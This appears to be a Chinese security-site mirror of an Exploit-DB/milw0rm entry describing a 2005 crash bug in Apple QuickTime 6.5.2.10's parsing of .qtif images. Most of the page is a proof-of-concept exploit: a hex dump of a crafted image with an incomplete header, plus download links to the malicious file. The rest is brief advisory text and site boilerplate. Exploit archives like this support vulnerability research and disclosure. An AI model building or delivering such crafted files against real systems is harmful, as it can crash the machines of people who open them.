Apple QuickTime 6.5.2.10 – ‘.qtif’ Image Parsing

Apple QuickTime 6.5.2.10 – ‘.qtif’ Image Parsing

漏洞ID 1054869 漏洞类型
发布时间 2005-01-24 更新时间 2005-01-24
图片[1]-Apple QuickTime 6.5.2.10 – ‘.qtif’ Image Parsing-安全小百科CVE编号 N/A
图片[2]-Apple QuickTime 6.5.2.10 – ‘.qtif’ Image Parsing-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/770
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Added qtif on milw0rm's sploits archive/ /str0ke #

Application: QuickTime
            http://www.apple.com/quicktime/

AFFECTED VERSION:
Versions verified to be vulnerable:
QuickTime.qts (6.5.2.10) and prior versions are affected.

The bug:
The problem specifically exists when QuickTime.qts component parsing
(.qtif) image files that contain uncompleted header.
A remote user can create a file that when processed by QuickTime PictureViewer or via browser,
will can cause the remote system to crash.

--Uncompleted qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/770.qtif (vuln.qtif)

00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010           ............rUidat......

VENDOR RESPONSE:
No vendor response.

Discoveried By ATmaCA
AtmacaSoft Inc.
http://www.atmacasoft.com

# milw0rm.com [2005-01-24]

相关推荐: MediaWiki Multiple Remote Input Validation Vulnerabilities

MediaWiki Multiple Remote Input Validation Vulnerabilities 漏洞ID 1097888 漏洞类型 Input Validation Error 发布时间 2004-10-14 更新时间 2004-10-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享